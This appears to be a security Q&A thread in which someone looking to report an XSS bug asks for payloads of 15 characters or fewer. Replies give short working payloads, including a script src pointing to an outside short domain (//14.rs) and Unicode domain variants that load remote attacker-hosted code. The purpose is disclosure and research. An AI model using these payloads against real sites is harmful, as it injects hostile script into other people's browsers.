# 15 Characters or Shorter XSS Payloads

Tags: xss

I found an XSS Vulnerability on a large site, and I want to report it, but the only limit to the vulnerability is that it only allows 15 characters maximum. This obviously has limits to what payloads you can run.

Does anybody know some interesting payloads that are 15 characters or less and demonstrate the vulnerability to report it?

Comment: i use `alert(666)` a lot.  something like `open("//ab.cd")` can be made bad. if you have an upload vuln, `location=/bad/` can be used to run more code.

Comment: @dandavis thanks, but alert(666) alone doesn't run, and I can't fit <script> or javascript

Comment: ah, well with including script tags, then i would think 15 chars is too little as `<script></script>` is 17 chars, and `<b onclick=>` leaves only 3 chars of attack; not enough.

Comment: fwiw, i couldn't think of much to do even with 15 chars of JS. 3-8 chars is likely harmless since quotes or parens would use up 2 of those, leaving 1-6 chars. i'd look into it more if the questioned weren't closed...

Answer (score 2, accepted):

Brutelogic wrote a brilliant article about this at http://brutelogic.com.br/blog/shortest-reflected-xss-possible/
some time ago.

One of the ideas from the article (paraphrased):

.. It’s possible to have an URL parameter echoed in a source of a script:

`<script src=“INPUT”></script>`

We can use this to launch a full XSS attack providing a source with a short domain like //14.rs (7 chars length). A variation decreases the injection to just 5 chars if double slashes are already in native code:

`<script src=“//INPUT”></script>`

`# <script src=“//14.rs”></script>`

Comment: `<base href=//0>` doesn't go anywhere, so i'm not sure it counts without a few more chars, and it will only work reflected, which is easy to detect...

Comment: Could you outline the key points of the article in your answer?

Comment: Arminius - absolutely. Gimme a minute.

Comment: replace "//.14.rs" with "//⒕₨" if exploiting older browsers. Use "//14.₨" for newer browsers (6 characters long). UNICODE matters. A shorter domain is possible, but I don't know of any other publicly availible ones that host an XSS payload.